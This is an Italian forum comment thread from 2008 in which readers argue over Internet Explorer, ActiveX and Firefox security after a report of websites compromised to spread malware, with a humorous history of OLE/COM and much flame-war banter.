            Explorer.allora con il tuo firefox clicca quihttps://addons.mozilla.org/it/firefox/downloads/file/25133/customizegoogle-0.71-fx+sm.xpiti appare una finestra con scritto "INSTALL NOW" centrato sullo schermo, finestra che non si chiude o INSTALLI o CANCELLI, non puoi fare altro, non puoi continuare a navigare nel sito che stavi navigandocosa è? mah sarà un aggiornamento di firefox, uno può pensare, non ho tempo, clicco su uno a caso, su 100, 80 magari cliccano su cancel, ma 20 su installmetti che li ci sia uno spyware con un semplice click sei fottutoora con IE vai in questa paginahttp://pcpitstop.com/testax.aspc'è un activeX, ma manco te ne accorgi se non sai che cosa è un activex, installi solo se sai che ti serve quell'activex perché il sito ti ha ha informato di installarlo, e in caso di dubbio non sei costretto a scegliere di installarlo o no, perché puoi continuare a navigare tranquillamentela gestione degli activeX da parte di IE in passato è stata pessima, facendogli guadagnare una cattiva fama, ma da IE 6 le cose sono cambiate, cioé stiamo parlando di 4 anni fa
          • Mik scrive:
            Re: Evidenziare il browser, please!

            allora con il tuo firefox clicca qui
            https://addons.mozilla.org/it/firefox/downloads/fi

            ti appare una finestra con scritto "INSTALL NOW"
            centrato sullo schermo, finestra che non si
            chiude o INSTALLI o CANCELLI, non puoi fare
            altro, non puoi continuare a navigare nel sito
            che stavi
            navigando
            correggo: solo se il sito è inserito nella lista degli attendibili appare la finestra, di fatto quindi la procedura è simile sia per IE che per firefox
          • krane scrive:
            Re: Evidenziare il browser, please!
            - Scritto da: Mik

            No: e' una questione di abitudine: l'utente sa

            che un'estensione serve ad uno scopo definito e

            si chiede il perche'; questo non vale per gli

            activeX.

            Questo grazie alle pessime abitudini in cui ha

            indotto il passato di

            Explorer.
            allora con il tuo firefox clicca qui
            https://addons.mozilla.org/it/firefox/downloads/fi

            ti appare una finestra con scritto "INSTALL NOW"
            centrato sullo schermo, finestra che non si
            chiude o INSTALLI o CANCELLI, non puoi fare
            altro, non puoi continuare a navigare nel sito
            che stavi navigandoVeramente non mi e' apparso nulla !!!
            cosa è? mah sarà un aggiornamento di firefox, uno
            può pensare, non ho tempo, clicco su uno a caso,
            su 100, 80 magari cliccano su cancel, ma 20 su
            install
            metti che li ci sia uno spyware con un semplice
            click sei fottuto
            ora con IE vai in questa pagina
            http://pcpitstop.com/testax.asp
            c'è un activeX, ma manco te ne accorgi se non sai
            che cosa è un activex, installi solo se sai che
            ti serve quell'activex perché il sito ti ha ha
            informato di installarlo, e in caso di dubbio non
            sei costretto a scegliere di installarlo o no,
            perché puoi continuare a navigare
            tranquillamente

            la gestione degli activeX da parte di IE in
            passato è stata pessima, facendogli guadagnare
            una cattiva fama, ma da IE 6 le cose sono
            cambiate, cioé stiamo parlando di 4 anni
            faE ti sembra molto ???Allora Vista e' gia' preistoria !-----------------------------------------------------------Modificato dall' autore il 14 marzo 2008 16.01-----------------------------------------------------------
          • Mik scrive:
            Re: Evidenziare il browser, please!


            ti appare una finestra con scritto "INSTALL NOW"

            centrato sullo schermo, finestra che non si

            chiude o INSTALLI o CANCELLI, non puoi fare

            altro, non puoi continuare a navigare nel sito

            che stavi navigando

            Veramente non mi e' apparso nulla !!!

            su quello mi ero già corretto vedi soprain ogni caso, con un attacco XSS, si riesce a iniettare del codice javascript all'interno di qualsiasi sito che non sanitizza gli input, e può essere IIS, apache, quello che vuoie questo codice javascript malevolo si potrebbe iniettare anche in tanti altri modi: contatori gratuiti, servizi di statistiche e tanto altro, scaricati dal webaster in buona fede (il gratis fa sempre gola) e inseriti sulle pagine del suo sitocomunque una volta che hai del codice javascript in esecuzione in una pagina puoi tracciare tante cose dell'utente che si collega a quella pagina: dammi tutti i tuoi cookie, mostrami cosa scrivi ecc.oppure compiere delle azioni come redirigere su un sito di phising richiamato in un iframe, oppure, come in questo caso sfruttare le vulnerabilità di un plugin del browserche sia IE o Firefox, non conta nullal'activex incriminato contenente il baco, è il RealPlayer, non esiste forse il RealPlayer per firefox?quello è esente da qualsiasi baco?
    • Lorenzo scrive:
      Re: Evidenziare il browser, please!
      Forse non hai capito la notizia, non parla di un virus che colpisce i pc ma i siti web stessi!
    • Ios scrive:
      Re: Evidenziare il browser, please!
      IE è il sistema più sicuro, non credo che sia un problema di browser
  • Anonimo scrive:
    La colpa è dell'IGNORANZA
    Ma ovviamente su PI fa più figo attaccare la Microsoft, quando in realtà la colpa non è sua, ma degli utonti che non capiscono niente di sicurezza.
    • gnomo scrive:
      Re: La colpa è dell'IGNORANZA
      - Scritto da: Anonimo
      Ma ovviamente su PI fa più figo attaccare la
      Microsoft, quando in realtà la colpa non è sua,
      ma degli utonti che non capiscono niente di
      sicurezza.no, activex è sempre stato un colabrodo: progettato per essere *comodo*, non *sicuro*quanto agli utenti, è un fatto di numeri: su centinaia di milioni di utenti, se l'1% si impesta, è già epidemia.Ma la cosa più interessante è come sia stati infettati i server: che SO avevano? Qualcuno ha cominciato a dare un'occhiata alle macchine compromesse per capire come è avvenuto il crack?Qualcuno ne sa qualcosa?
    • Ponzio Pilato scrive:
      Re: La colpa è dell'IGNORANZA
      Quando non si sa cosa dire, ecco arrivare la solita spiegazione di comodo.Sarebbe però opportuno chiedersi se gli ignoranti sono gli utenti Windows o chi Windows lo ha sviluppato (sviluppato è una parola grossa)!
    • dimme te scrive:
      Re: La colpa è dell'IGNORANZA
      - Scritto da: Anonimo
      Ma ovviamente su PI fa più figo attaccare la
      Microsoft, quando in realtà la colpa non è sua,
      ma degli utonti che non capiscono niente di
      sicurezza.non sai quanto hai ragione!
    • Franco scrive:
      Re: La colpa è dell'IGNORANZA
      - Scritto da: Anonimo
      Ma ovviamente su PI fa più figo attaccare la
      Microsoft, quando in realtà la colpa non è sua,
      ma degli utonti che non capiscono niente di
      sicurezza.Forse farà più figo far quel che dici tu,ma sicuramente fa più sfigato difende Explorer...
      • Anonimo scrive:
        Re: La colpa è dell'IGNORANZA
        - Scritto da: Franco
        Forse farà più figo far quel che dici tu,ma
        sicuramente fa più sfigato difende
        Explorer...Difendere Exploder non e' sfigato, e' patetico.
    • pabloski scrive:
      Re: La colpa è dell'IGNORANZA
      - Scritto da: Anonimo
      Ma ovviamente su PI fa più figo attaccare la
      Microsoft, quando in realtà la colpa non è sua,
      ma degli utonti che non capiscono niente di
      sicurezza.è strano che quando appare una vulnerabilità in Linux tutto a dire: "eh lo sapevo, il solito OS da cantinari...." quando invece succede a Windows tutti lì a difenderlobeh mi dispiace farti notare che è stata Microsoft a voler dare i computer agli ignoranti, adesso se ne facciano carico e scrivano software decente
  • Venditore di tappeti scrive:
    INTERNET EXPLORER AL TAPPETO
    (troll)(troll1)(troll2)(troll3)(troll4)
    • Ponzio Pilato scrive:
      Re: INTERNET EXPLORER AL TAPPETO
      Fosse solo Interned ExploDer al tappeto ...Il problema è che i virus bucano un firewall colabrodo di un sistema operativo colabrodo; poi ExploDer fa il resto.
      • unoduetre scrive:
        Re: INTERNET EXPLORER AL TAPPETO
        ma PAYPAL non aveva detto che IE7 è il piu sicuro?!?! :DAUHAUAUHAUHAUHAUH, le ActiveX, UHAUHAUHAUAUHAUH
        • pabloski scrive:
          Re: INTERNET EXPLORER AL TAPPETO
          - Scritto da: unoduetre
          ma PAYPAL non aveva detto che IE7 è il piu
          sicuro?!?!
          :D


          AUHAUAUHAUHAUHAUH, le ActiveX, UHAUHAUHAUAUHAUHe infatti aveva ricevuto 40 milioni di $ per dirlo :D
  • Andrea_Cuomo scrive:
    Ma questi ActiveX...
    ... a parte farci raccogliere virus servono anche a qualcos' altro?-----------------------------------------------------------Modificato dall' autore il 14 marzo 2008 01.23-----------------------------------------------------------
    • Francisco Navarro scrive:
      Re: Ma questi ActiveX...
      - Scritto da: Andrea_Cuomo
      ... a parte farci raccogliere virus servono anche
      a qualcos'
      altro?In principio fu il file di testo, semplice e puro, e diversi word processor che "davano una mano" a descrivere come il documento sarebbe dovuto apparire su carta.Poi arrivò windows 2, e nel suo "write" fornito di default si potevano scrivere documenti che sullo schermo davano un'idea precisa di come sarebbero stati sulla carta. A ruota, Word per ms-dos seguì lo stesso destino.Venne la possibilità di incorporare immagini, e gli sviluppatori Microsoft videro che era cosa buona e giusta.Uno sviluppatore più intraprendente disse allora: e se incorporassimo qualcosa di più che solo immagini? tipo un suono, un'animazione, o un altro genere di documento...Un altro rispose: ...e come li facciamo rappresentare all'interno del documento?E il primo: li facciamo rappresentare dall'applicazione che gestisce questi documenti incorporati!E l'altro: un'applicazione dentro l'altra... un documento dentro l'altroE in coro: "collegamento e inclusione di oggetti"!!!Nacque così la convenzione OLE (Object Linking and Embedding), successivamente rinominato in COM (Compound Object Model)Le applicazioni per Windows dovevano però essere scritte in C, e gestire OLE/COM in C era particolarmente difficoltoso... iniziarono a salire le urla di protesta dei programmatori principianti che finora avevano sviluppato in GW-Basic, poi in QuickBasic, e infine nei primi Visual Basic... e che volevano anche loro mettere le mani su OLE/COM ma senza sputare sangue come gli sviluppatori C/C++Detto fatto! creazione di oggetti interattivi in Visual Basic! (VB5) Oggetti che possono essere utilizzati in altre applicazioni, ma perfino in documenti... ed ecco spuntare VBA all'interno di Office... ma diamogli un nome carino a questi oggetti interattivi... sembrano vivi... attivi... Active Objects! mettiamoci una X che fa più figo: ActiveX!Nel frattempo arrivò il Web. Mosaic, Netscape, e poi dietro, lanciato alla rincorsa, Internet Explorer 1, 2, 3... ma che bello l'HTML, che bella questa pagina, sembra quella di Word dove ci puoi scrivere quello che vuoi... E se ci mettessimo dentro anche dei componenti interattivi?Beh ce li abbiamo già: inventiamoci un tag per posizionare gli ActiveX all'interno della pagina, il resto lo lasciamo fare a OLE e COM.Wow! Funziona! Ops... Ma se un utente non ha il componente installato, che si fa?Semplice! permettiamo al disegnatore di impacchettare le dll e caricarle sul webserver, per poi farle scaricare all'utente finale...Ma non tutti gli sviluppatori sono dei bravi sviluppatori con l'aureola... alcuni hanno anche un bel paio di corna, e un curriculum pieno di virus... e gli ActiveX erano e sono un'occsione troppo ghiotta....OOOOOOPSSSssss......
      • zio scrive:
        Re: Ma questi ActiveX...
        - Scritto da: Francisco Navarro
        - Scritto da: Andrea_Cuomo

        ... a parte farci raccogliere virus servono
        anche

        a qualcos'

        altro?

        In principio fu il file di testo, semplice e
        puro, e diversi word processor che "davano una
        mano" a descrivere come il documento sarebbe
        dovuto apparire su
        carta.Era il CP/M

        Poi arrivò windows 2,Cheeeeee ? Arrivavano 10000 altri prodotti prima (rotfl)(rotfl)(rotfl)
        e nel suo "write" fornito
        di default si potevano scrivere documenti che
        sullo schermo davano un'idea precisa di come
        sarebbero stati sulla carta. A ruota, Word per
        ms-dos seguì lo stesso
        destino.

        Venne la possibilità di incorporare immagini, e
        gli sviluppatori Microsoft videro che era cosa
        buona e
        giusta.Di copiarla ! Era già presente in altri programmi !

        Uno sviluppatore più intraprendente disse allora:
        e se incorporassimo qualcosa di più che solo
        immagini? tipo un suono, un'animazione, o un
        altro genere di
        documento...Di copiarla ! Era già presente in altri programmi !
        Un altro rispose: ...e come li facciamo
        rappresentare all'interno del
        documento?Di copiarla ! Era già presente in altri programmi !
        E il primo: li facciamo rappresentare
        dall'applicazione che gestisce questi documenti
        incorporati!
        E l'altro: un'applicazione dentro l'altra... un
        documento dentro
        l'altro
        E in coro: "collegamento e inclusione di
        oggetti"!!!
        Di copiarla ! Era già presente in altri programmi !
        Nacque così la convenzione OLE (Object Linking
        and Embedding), successivamente rinominato in COM
        (Compound Object
        Model)Naqu cosi' la copia MS !

        Le applicazioni per Windows dovevano però essere
        scritte in C, e gestire OLE/COM in C era
        particolarmente difficoltoso... iniziarono a
        salire le urla di protesta dei programmatori
        principianti che finora avevano sviluppato in
        GW-Basic, poi in QuickBasic, e infine nei primi
        Visual Basic... e che volevano anche loro mettere
        le mani su OLE/COM ma senza sputare sangue come
        gli sviluppatori
        C/C++Infatti il sistema MS faceva schifo !!!

        Detto fatto! creazione di oggetti interattivi in
        Visual Basic! (VB5) Oggetti che possono essere
        utilizzati in altre applicazioni, ma perfino in
        documenti... ed ecco spuntare VBA all'interno di
        Office... ma diamogli un nome carino a questi
        oggetti interattivi... sembrano vivi... attivi...
        Active Objects! mettiamoci una X che fa più figo:
        ActiveX!Di copiarla ! Era già presente in altri programmi !

        Nel frattempo arrivò il Web. Mosaic, Netscape, e
        poi dietro, lanciato alla rincorsa,Veramente non lo voleva nessuno !Comunque di copiarla ! Era già presente in altri programmi !
        Internet
        Explorer 1, 2, 3... ma che bello l'HTML, che
        bella questa pagina, sembra quella di Word dove
        ci puoi scrivere quello che vuoi... E se ci
        mettessimo dentro anche dei componenti
        interattivi?Di copiarla ! Era già presente in altri programmi !

        Beh ce li abbiamo già: inventiamoci un tag per
        posizionare gli ActiveX all'interno della pagina,
        il resto lo lasciamo fare a OLE e
        COM.La stupidata MS per evitare XML e javascript di Netscape

        Wow! Funziona! Ops... Ma se un utente non ha il
        componente installato, che si
        fa?
        Semplice! permettiamo al disegnatore di
        impacchettare le dll e caricarle sul webserver,
        per poi farle scaricare all'utente
        finale...bella schifezza !

        Ma non tutti gli sviluppatori sono dei bravi
        sviluppatori con l'aureola... alcuni hanno anche
        un bel paio di corna, e un curriculum pieno di
        virus... e gli ActiveX erano e sono un'occsione
        troppo
        ghiotta....

        OOOOOOPSSSssss......L'occasione fa l'uomo ladro ! La MS ..... !
        • Francisco Navarro scrive:
          Re: Ma questi ActiveX...
          - Scritto da: zio

          Cheeeeee ? Arrivavano 10000 altri prodotti prima
          (rotfl)(rotfl)(rotfl)
          Lo so benissimo. Ti dispiace che non li abbia citati? Volevo solo l'origine di tutta questa bagarre... e il post mi sembra già abbastanza lungo.

          Di copiarla ! Era già presente in altri programmi!(x7)That's business, man!Ah, il post era ironico, non c'era alcuna intenzione di esaltare Microsoft e/o insultare CP/M (da cui ha preso la riga di comando) o Xerox (da cui ha preso l'interfaccia grafica). Contento ora?
          L'occasione fa l'uomo ladro ! La MS ..... !La Microsoft fa affari, come una qualsiasi azienda dedita al lucro. Proprio per questo che dobbiamo stare tutti attenti. TUTTI.
      • dafdsaf scrive:
        Re: Ma questi ActiveX...
        - Scritto da: Francisco Navarro
        - Scritto da: Andrea_Cuomo

        ... a parte farci raccogliere virus servono
        anche

        a qualcos'

        altro?

        In principio fu il file di testo, semplice e
        puro, e diversi word processor che "davano una
        mano" a descrivere come il documento sarebbe
        dovuto apparire su
        carta.

        Poi arrivò windows 2, e nel suo "write" fornito
        di default si potevano scrivere documenti che
        sullo schermo davano un'idea precisa di come
        sarebbero stati sulla carta. A ruota, Word per
        ms-dos seguì lo stesso
        destino.

        Venne la possibilità di incorporare immagini, e
        gli sviluppatori Microsoft videro che era cosa
        buona e
        giusta.

        Uno sviluppatore più intraprendente disse allora:
        e se incorporassimo qualcosa di più che solo
        immagini? tipo un suono, un'animazione, o un
        altro genere di
        documento...
        Un altro rispose: ...e come li facciamo
        rappresentare all'interno del
        documento?
        E il primo: li facciamo rappresentare
        dall'applicazione che gestisce questi documenti
        incorporati!
        E l'altro: un'applicazione dentro l'altra... un
        documento dentro
        l'altro
        E in coro: "collegamento e inclusione di
        oggetti"!!!

        Nacque così la convenzione OLE (Object Linking
        and Embedding), successivamente rinominato in COM
        (Compound Object
        Model)

        Le applicazioni per Windows dovevano però essere
        scritte in C, e gestire OLE/COM in C era
        particolarmente difficoltoso... iniziarono a
        salire le urla di protesta dei programmatori
        principianti che finora avevano sviluppato in
        GW-Basic, poi in QuickBasic, e infine nei primi
        Visual Basic... e che volevano anche loro mettere
        le mani su OLE/COM ma senza sputare sangue come
        gli sviluppatori
        C/C++

        Detto fatto! creazione di oggetti interattivi in
        Visual Basic! (VB5) Oggetti che possono essere
        utilizzati in altre applicazioni, ma perfino in
        documenti... ed ecco spuntare VBA all'interno di
        Office... ma diamogli un nome carino a questi
        oggetti interattivi... sembrano vivi... attivi...
        Active Objects! mettiamoci una X che fa più figo:
        ActiveX!

        Nel frattempo arrivò il Web. Mosaic, Netscape, e
        poi dietro, lanciato alla rincorsa, Internet
        Explorer 1, 2, 3... ma che bello l'HTML, che
        bella questa pagina, sembra quella di Word dove
        ci puoi scrivere quello che vuoi... E se ci
        mettessimo dentro anche dei componenti
        interattivi?

        Beh ce li abbiamo già: inventiamoci un tag per
        posizionare gli ActiveX all'interno della pagina,
        il resto lo lasciamo fare a OLE e
        COM.

        Wow! Funziona! Ops... Ma se un utente non ha il
        componente installato, che si
        fa?
        Semplice! permettiamo al disegnatore di
        impacchettare le dll e caricarle sul webserver,
        per poi farle scaricare all'utente
        finale...

        Ma non tutti gli sviluppatori sono dei bravi
        sviluppatori con l'aureola... alcuni hanno anche
        un bel paio di corna, e un curriculum pieno di
        virus... e gli ActiveX erano e sono un'occsione
        troppo
        ghiotta....

        OOOOOOPSSSssss......wow! carino e simpatico come sunto! :)
      • pabloski scrive:
        Re: Ma questi ActiveX...
        cioè in pratica stai dicendo che è colpa dei virus writer? se loro non esistessero non ci sarebbero i virus....bravo, se non esistessero i delinquenti la polizia non dovrebbe far nulla, si però i delinquenti esistono e pure i virusActiveX è architetturalmente un aborto senza eguali ed è la copia handicappata di Corba
        • Francisco Navarro scrive:
          Re: Ma questi ActiveX...
          - Scritto da: pabloski
          cioè in pratica stai dicendo che è colpa dei
          virus writer? se loro non esistessero non ci
          sarebbero i
          virus....
          Non cercare di mettermi in bocca parole che non ho detto. La mia intenzione è stata quella di ripercorrere per sommi capi (molto "sommi") l'origine degli ActiveX, a beneficio di Andrea Cuomo.
          bravo, se non esistessero i delinquenti la
          polizia non dovrebbe far nulla, si però i
          delinquenti esistono e pure i
          virus
          Ogni azione che facciamo ha conseguenze per tutti, grandi o piccole che siano. Ci sono state decisioni infelici prese di fretta, un affanno nel rincorrere la "moda", imprecazioni, sotterfugi ("Daremo via gratis quello che vendono loro"). Purtroppo è un mondo difficile e pieno di figli di puttana. Dobbiamo avere a che fare anche con loro, sempre.
          ActiveX è architetturalmente un aborto senza
          eguali ed è la copia handicappata di
          CorbaHai ragione, nulla da eccepire. Ma è stato pubblicizzato meglio, ci sono state innumerevoli operazioni di marketing, persuasion, certificazioni che alla fine non valevano nemmeno la carta su cui erano stampate... quando OLE cominciava a diffondersi con il vestito elegante di COM, durante le super-presentazioni e le sessioni tecniche Microsoft non era inusuale vedere i "COM Evangelist" aggirarsi tra gli stand.That's business, man.
    • Anonimo scrive:
      Re: Ma questi ActiveX...
      - Scritto da: Andrea_Cuomo
      ... a parte farci raccogliere virus servono anche
      a qualcos'
      altro?A far vendere firewall, antivirus, patches al sistema, nuovi sistemi operativi...Eventualmente servono alle agenzie governative per mettere il naso nella tua macchina, e alla peppermint per vedere i tuoi download.
      • rotfl scrive:
        Re: Ma questi ActiveX...
        - Scritto da: Anonimo
        - Scritto da: Andrea_Cuomo

        ... a parte farci raccogliere virus servono
        anche

        a qualcos'

        altro?

        A far vendere firewallAh perche' un firewall blocca gli ActiveX adesso?
        antivirus, patches al sistema, nuovi sistemi
        operativi...A parte che le patches sono gratis, con "i nuovi sistemi operativi" intendi Vista? Che razza di soluzione al problema ActiveX sarebbe visto che Vista usa gli ActiveX anch'esso? Non usare IE e gli ActiveX non sono piu' un problema di sicurezza per gli exploit via web che li sfruttano...
        Eventualmente servono alle agenzie governative
        per mettere il naso nella tua macchina, e alla
        peppermint per vedere i tuoi
        downloadE allora dacci una prova di quello che dici, che gli ActiveX sono usati per lanciare degli exploit dai governi e dalla peppermint.
        • leo scrive:
          Re: Ma questi ActiveX...

          Ah perche' un firewall blocca gli ActiveX adesso?alcuni firewall sì ;) (online armor e CREDO sunbelt)
  • flamer scrive:
    Piccolo prezzo da pagare
    Cerchiamo di essere ragionevoli e di non scatenare bagarre inutili: semplicemente, non è ora di considerare il piccolo (o meno piccolo, dipende dal livello di confidenza col mezzo) disagio comportato dalla migrazione verso sistemi operativi più robusti, od almeno verso browser più affidabili, un piccolo prezzo da pagare per avere un po' più di sicurezza per il proprio desktop? L'invito è ovvamente rivolto agli utenti Micro$oft.
    • Maurus scrive:
      Re: Piccolo prezzo da pagare
      Come sicuramente noto lei è un'utente esperto in fatto di sistemi operativi, sicuramente conosce le difficoltà che un utente che utilizza windows da una vita contrae nel passare a un sistema diverso o a un browser diverso. Basta pensare all'utente semplice, che appena trova una virgola fuori posto nel suo pc entra ne panico.E' sempre facile parlare da persone esperte, e certamente se diverse persone non fanno lo sforzo di abituarsi a qualcosa di più sicuro si tratta della pigrizia mentale del passaggio e di ciò che comporta
      • povera grammatica scrive:
        Re: Piccolo prezzo da pagare
        "Un'utente", maschile con l'apostrofo: che orrore! :@
      • vac scrive:
        Re: Piccolo prezzo da pagare
        Cambiare sistema operativo può essere complesso, ma cambiare browser!?La maggior parte degli utenti di I.E. infatti sono le aziende che costringono i dipendenti ad utilizzare software preinstallato.(come nel mio caso)P.S. Dalle statistiche web si nota che la % di navigatori che usano I.E. cala drasticamente la sera e nei week end
      • webepoque scrive:
        Re: Piccolo prezzo da pagare
        probabilmente è facile parlare da persone esperte...ma allora visto che si è esperti si potrebbe anche aiutare i meno esperti.Tipo il solito ubuntu, potrebbe magari essere kubuntu con quell'interfaccia kde che tanto assomiglia a windows...insomma, se uno ci tiene le possibilità per non incorrere in vari problemi le trova tuttee se non riesce a trovarle da solo... beh, il mondo si sta riempiendo di gente che senza essere professionista può offrire una possibilità alternativa a M$bye
    • pabloski scrive:
      Re: Piccolo prezzo da pagare
      infatti le istituzione serie quel prezzo lo pagano e senza tanti problemi, vedi il Pentagono che ha deciso di affidarsi a sistemi Linux customizzati per la nuova infrastruttura di comando congiunto della NATOi sistemi d'arma usano già oggi sistemi Linux real-time, QNX e vxWorks
  • Ponzio Pilato scrive:
    Naturalmente, nessun commento ...
    Chissà perchè questa notizia non raccoglie nessun commento da parte di quella gente che paga un sacco di soldi per avere un sistema operativo che, nel 2008, viene ancora bucato con disarmante facilità da virus ridicoli!In 30 anni di esitenza la Microsoft ha raggiunto questi straordinari risultati!
    • Andrea_Cuomo scrive:
      Re: Naturalmente, nessun commento ...
      - Scritto da: Ponzio Pilato
      Chissà perchè questa notizia non raccoglie nessun
      commento da parte di quella gente che paga un
      sacco di soldi per avere un sistema operativo
      che, nel 2008, viene ancora bucato con disarmante
      facilità da virus
      ridicoli!ma non sai che secondo gli avvocati Microsoft anche l'open source é un virus ?ROTFL !
  • Franco scrive:
    E guerra sia!
    Oggi ci sono un sacco di articoli scatena-flames!Questo su windows ed active X si presta molto bene!
    • Andrea_Cuomo scrive:
      Re: E guerra sia!
      - Scritto da: Franco
      Oggi ci sono un sacco di articoli scatena-flames!
      Questo su windows ed active X si presta molto
      bene!non penso ci sia nessuna guerra e nessuna discussione,la discussione é giá finita:un qualsiasi utente con un minimo di preparazione e considerazione per problematiche di sicurezza NON PRENDE NEMMENO IN CONSIDERAZIONE di utilizzare IE.Io uso per 95% dei siti Opera e per il restante firefox.MAI preso un virus on-line.
      • Franco scrive:
        Re: E guerra sia!
        Ah ma io son daccordo con te!ho addirittura eliminato il problema virus cambiano sistema operativo.Purtroppo non hai idea del tipo di gente che gira su questo forum,se la smettono di scannarsi nell'articolo su gnome ed xp su tv samsung, allora forse ne vedrai arrivare qui qualcuno a dirti che explorer spacca ed è troppo bello graficamente- Scritto da: Andrea_Cuomo
        - Scritto da: Franco

        Oggi ci sono un sacco di articoli
        scatena-flames!

        Questo su windows ed active X si presta molto

        bene!

        non penso ci sia nessuna guerra e nessuna
        discussione,
        la discussione é giá finita:

        un qualsiasi utente con un minimo di preparazione
        e considerazione per problematiche di sicurezza
        NON PRENDE NEMMENO IN CONSIDERAZIONE di
        utilizzare
        IE.

        Io uso per 95% dei siti Opera e per il restante
        firefox.
        MAI preso un virus on-line.
        • abc scrive:
          Re: E guerra sia!
          - Scritto da: Franco
          Ah ma io son daccordo con te!ho addirittura
          eliminato il problema virus cambiano sistema
          operativo.
          Purtroppo non hai idea del tipo di gente che gira
          su questo forum,se la smettono di scannarsi
          nell'articolo su gnome ed xp su tv samsung,
          allora forse ne vedrai arrivare qui qualcuno a
          dirti che explorer spacca ed è troppo bello
          graficamenteInfatti è così.Internet Explorer è il miglior browser in assoluto.(win)
          • zio scrive:
            Re: E guerra sia!
            - Scritto da: abc

            Infatti è così.
            Internet Explorer è il miglior browser in
            assoluto.

            (win)Ecco uno dei responsabili dell'attacco ?(rotfl)(rotfl)(rotfl)
          • unoduetre scrive:
            Re: E guerra sia!
            lo dice anche PAYPAL!!!!!111ONEONEAUHAUHAHA :D
      • dimme te scrive:
        Re: E guerra sia!
        ogni volta che leggo ste cosemi viene da ridere....e vomitare!usato sempre IE e mai, MAI, presonulla. Sapete, oltre che a saperclikkare e navigare, bisogna anchesapersi proteggere dai virus? Possoutilizzare il browser piu sicuro almondo, ma se non so' proteggere ilmio PC, allora buonanotte!Lo so che è un concetto difficilema vedrete che con il tempo anche voi ci arriverete!
        • Franco scrive:
          Re: E guerra sia!
          - Scritto da: dimme te
          ogni volta che leggo ste cose
          mi viene da ridere....e vomitare!
          Eh ma purtroppo è reciproco...
          usato sempre IE e mai, MAI, preso
          nulla. Sapete, oltre che a saper
          clikkare e navigare, bisogna anche
          sapersi proteggere dai virus? Posso
          utilizzare il browser piu sicuro al
          mondo, ma se non so' proteggere il
          mio PC, allora buonanotte!Caspita!un concetto cosi ovvio!incredibile che nessuno vi sia mai arrivato!!!Sai dov'è il problema però?Esistono alternative che oggettivamente sono migliori e che non ti obbligano a dover "imparare a a navigare".Explorer è un colabrodo,punto!non lo dico io,lo dice secunia e lo dicono esperti del settore: poi se vuoi possiamo far finta che non sia cosi schifoso come sembra...sai per farti felice....

          Lo so che è un concetto difficile
          ma vedrete che con il tempo anche voi
          ci arriverete!
          • mech_user scrive:
            Re: E guerra sia!
            - Scritto da: Franco

            Lo so che è un concetto difficile

            ma vedrete che con il tempo anche voi

            ci arriverete!Non perdere tempo a rispondere, sono trollate.
          • dimme te scrive:
            Re: E guerra sia!
            - Scritto da: Franco
            - Scritto da: dimme te

            ogni volta che leggo ste cose

            mi viene da ridere....e vomitare!



            Eh ma purtroppo è reciproco...


            usato sempre IE e mai, MAI, preso

            nulla. Sapete, oltre che a saper

            clikkare e navigare, bisogna anche

            sapersi proteggere dai virus? Posso

            utilizzare il browser piu sicuro al

            mondo, ma se non so' proteggere il

            mio PC, allora buonanotte!

            Caspita!un concetto cosi ovvio!incredibile che
            nessuno vi sia mai arrivato!!!Sai dov'è il
            problema
            però?
            Esistono alternative che oggettivamente sono
            migliori e che non ti obbligano a dover "imparare
            a a
            navigare".
            Explorer è un colabrodo,punto!non lo dico io,lo
            dice secunia e lo dicono esperti del settore: poi
            se vuoi possiamo far finta che non sia cosi
            schifoso come sembra...sai per farti
            felice....



            Lo so che è un concetto difficile

            ma vedrete che con il tempo anche voi

            ci arriverete!grazie "genio", ma preferisco winzozz perche ci lavoroe le alternative non mi danno nulla di che campare.Explorer ha delle falle come le hanno tutti gli altribrowser, questo lo sai si? non serve che mi fai felice,lo sono già! grazie comunque per il commento moltoistruttivo!
          • AtariLover scrive:
            Re: E guerra sia!
            - Scritto da: dimme te

            grazie "genio", ma preferisco winzozz perche ci
            lavoro
            e le alternative non mi danno nulla di che
            campare.Ah ecco perchè... :D
        • Infatti scrive:
          Re: E guerra sia!
          - Scritto da: dimme te
          bisogna anche
          sapersi proteggere dai virus?Che domanda è....comunque dipende dal sistema che usi: se usi Windoes, ti conviene imparare, se usi Linux, puoi fare anche a meno.
          • .poz scrive:
            Re: E guerra sia!
            - Scritto da: Infatti
            - Scritto da: dimme te

            bisogna anche

            sapersi proteggere dai virus?

            Che domanda è....comunque dipende dal sistema che
            usi: se usi Windoes, ti conviene imparare, se usi
            Linux, puoi fare anche a
            meno.se usi linux hai già imparato ;)
          • webepoque scrive:
            Re: E guerra sia!
            Ehi ehi...e mac os x dove lo lasciate?a proposito... io uso solo mac e linux... qualcuno sa dirmi cosa sia sostanzialmente un virus e cosa possa combinare?grazie... ;)
        • rotfl scrive:
          Re: E guerra sia!
          - Scritto da: dimme te
          ogni volta che leggo ste cose
          mi viene da ridere....e vomitare!

          usato sempre IE e mai, MAI, preso
          nulla(rotfl) Credici, credici. Perche' infatti tutti i malware (specie oggi) hanno un pupazzetto che esce dallo schermo e che ti fa "bau", eh? Non ti rendi conto che ci sono malware che sono pressoche' irrilevabili dal sistema operativo stesso e che fanno di tutto per far credere all'utente che tutto funzioni perfettamente?
          • dimme te scrive:
            Re: E guerra sia!
            - Scritto da: rotfl
            - Scritto da: dimme te

            ogni volta che leggo ste cose

            mi viene da ridere....e vomitare!



            usato sempre IE e mai, MAI, preso

            nulla

            (rotfl) Credici, credici. Perche' infatti tutti i
            malware (specie oggi) hanno un pupazzetto che
            esce dallo schermo e che ti fa "bau", eh? Non ti
            rendi conto che ci sono malware che sono
            pressoche' irrilevabili dal sistema operativo
            stesso e che fanno di tutto per far credere
            all'utente che tutto funzioni
            perfettamente?ma sei sicuro? un pupazzetto? o mio dio!io sto' tranquillo e bene come sto, nonpreoccuparti. il computer lo so usare, magarivatti a fare un bel corso prima!
          • rotfl scrive:
            Re: E guerra sia!
            - Scritto da: dimme te
            ma sei sicuro? un pupazzetto? o mio dio!
            io sto' tranquillo e bene come sto, non
            preoccuparti. il computer lo so usare, magari
            vatti a fare un bel corso primaROTFL... hahaha... ma Dio mio, questo forum e' veramente a livelli da Cottolengo...
Chiudi i commenti